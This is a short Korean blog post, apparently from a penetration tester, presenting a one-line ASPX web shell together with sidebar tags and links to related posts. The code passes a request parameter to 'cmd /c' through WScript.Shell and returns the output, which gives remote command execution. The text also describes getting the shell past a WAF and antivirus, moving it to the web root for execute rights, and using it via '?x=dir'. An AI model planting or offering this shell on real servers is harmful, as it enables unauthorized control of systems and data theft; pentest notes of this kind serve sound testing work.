| 일 | 월 | 화 | 수 | 목 | 금 | 토 |
|---|---|---|---|---|---|---|
| 1 | 2 | 3 | ||||
| 4 | 5 | 6 | 7 | 8 | 9 | 10 |
| 11 | 12 | 13 | 14 | 15 | 16 | 17 |
| 18 | 19 | 20 | 21 | 22 | 23 | 24 |
| 25 | 26 | 27 | 28 | 29 | 30 | 31 |
Tags
- 취약점
- self-signed
- intelmac
- mitmproxy
- 내부확산
- EC2
- XSS
- jeb_mcp
- S3
- shell_gpt
- 네이버카페
- 채팅환전사기
- Frida
- cve-2025-55182
- 허리디스크
- 안전결제
- 많다..
- ssrf
- Malware Sample
- LFI
- ue4dumper
- AWS
- 척추관협착증
- Sequoia
- react2shell
- 중고나라
- 모의해킹
- aes
- 변태는
Archives
- Today
- Total
annyoung
aspx one line webshell 본문
<%
Response.write(CreateObject("WScript.Shell").Exec("cmd /c " + request("x")).StdOut.Readall())
%>
대중적으로 사용되는 웹쉘들이 업로드가 아예 안됐는데 앞단에 WAF가 존재했고, IIS 서버에서는 안랩 랜섬웨어 관련 백신이 돌고 있었다. 안올라가는 이유를 모르겠으나.. ModSecurity가 돌고 있는것 같기도하고.. 확실하진 않다.
Set, Let과 같은 지시어를 사용해 변수 선언이 아예 불가능해서 하나 하나 테스트하면서 결국 찾았다..
Upload 되는 디렉토리에서는 실행 권한이 빠져있는 것 같아서 최상위 디렉토리로 올려서 실행했다.
아무튼 사용 방법은 /shell.aspx?x=dir로 사용하면 된다.
'모의해킹' 카테고리의 다른 글
| Unreal Engine 4.27.2 dump with split apk (48) | 2024.07.25 |
|---|---|
| Frida UnrealEngine 4.27.2 후킹 (0) | 2024.07.23 |
| 맥 네트워크 프록시 명령어로 껐다 켰다하기 (2) | 2024.05.23 |
| pdf generator SSRF (2) | 2023.11.28 |
| 클라이언트 프레임워크 디버깅 쉽게하기 (2) | 2023.11.21 |
'모의해킹' Related Articles
more
Comments